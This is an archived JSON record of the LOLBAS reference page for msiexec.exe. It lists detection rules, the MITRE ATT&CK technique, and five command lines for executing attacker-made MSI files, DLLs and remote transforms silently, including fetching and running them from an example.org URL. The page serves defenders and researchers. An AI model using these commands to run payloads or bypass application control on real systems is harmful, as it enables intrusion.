{ "id": "503222c4-621d-4da6-ade7-a1a413081329", "created_at": "2026-04-06T00:09:05.377161Z", "updated_at": "2026-04-10T03:21:16.924899Z", "deleted_at": null, "sha1_hash": "f8df711aec0d19ec3e79da3afed239d7fb8283bb", "title": "Msiexec on LOLBAS", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 55393, "plain_text": "Msiexec on LOLBAS\r\nArchived: 2026-04-05 20:31:03 UTC\r\n.. /Msiexec.exe\r\nUsed by Windows to execute msi files\r\nPaths:\r\nC:\\Windows\\System32\\msiexec.exe\r\nC:\\Windows\\SysWOW64\\msiexec.exe\r\nResources:\r\nhttps://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/\r\nhttps://twitter.com/PhilipTsukerman/status/992021361106268161\r\nhttps://badoption.eu/blog/2023/10/03/MSIFortune.html\r\nAcknowledgements:\r\nnetbiosX (@netbiosX)\r\nPhilip Tsukerman (@PhilipTsukerman)\r\nDetections:\r\nSigma: proc_creation_win_msiexec_web_install.yml\r\nSigma: proc_creation_win_msiexec_masquerading.yml\r\nElastic: defense_evasion_network_connection_from_windows_binary.toml\r\nSplunk: uninstall_app_using_msiexec.yml\r\nIOC: msiexec.exe retrieving files from Internet\r\nExecute\r\n1. Installs the target .MSI file silently.\r\nmsiexec /quiet /i file.msi\r\nUse case\r\nExecute custom made msi file with attack code\r\nPrivileges required\r\nUser\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Msiexec/\r\nPage 1 of 4\n\nOperating systems\r\nWindows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1218.007: Msiexec\r\nTags\r\nExecute: MSI\r\n2. Installs the target remote \u0026 renamed .MSI file silently.\r\nmsiexec /q /i https://www.example.org/file.ext\r\nUse case\r\nExecute custom made msi file with attack code from remote server\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1218.007: Msiexec\r\nTags\r\nExecute: MSI\r\nExecute: Remote\r\n3. Calls DllRegisterServer to register the target DLL.\r\nmsiexec /y C:\\Windows\\Temp\\file.dll\r\nUse case\r\nExecute dll files\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1218.007: Msiexec\r\nTags\r\nExecute: DLL\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Msiexec/\r\nPage 2 of 4\n\nExecute: Remote\r\n4. Calls DllUnregisterServer to un-register the target DLL.\r\nmsiexec /z C:\\Windows\\Temp\\file.dll\r\nUse case\r\nExecute dll files\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1218.007: Msiexec\r\nTags\r\nExecute: DLL\r\nExecute: Remote\r\n5. Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a\r\ntransformation file will be used, which can contains malicious code or binaries. The /qb will skip user\r\ninput.\r\nmsiexec /i C:\\Windows\\Temp\\file.msi TRANSFORMS=\"https://www.example.org/file.mst\" /qb\r\nUse case\r\nInstall trusted and signed msi file, with additional attack code as transformation file, from a remote\r\nserver\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1218.007: Msiexec\r\nTags\r\nExecute: MSI\r\nExecute: MST\r\nExecute: Remote\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Msiexec/\r\nPage 3 of 4\n\nSource: https://lolbas-project.github.io/lolbas/Binaries/Msiexec/\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Msiexec/\r\nPage 4 of 4", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://lolbas-project.github.io/lolbas/Binaries/Msiexec/" ], "report_names": [ "Msiexec" ], "threat_actors": [], "ts_created_at": 1775434145, "ts_updated_at": 1775791276, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/f8df711aec0d19ec3e79da3afed239d7fb8283bb.pdf", "text": "https://archive.orkl.eu/f8df711aec0d19ec3e79da3afed239d7fb8283bb.txt", "img": "https://archive.orkl.eu/f8df711aec0d19ec3e79da3afed239d7fb8283bb.jpg" } }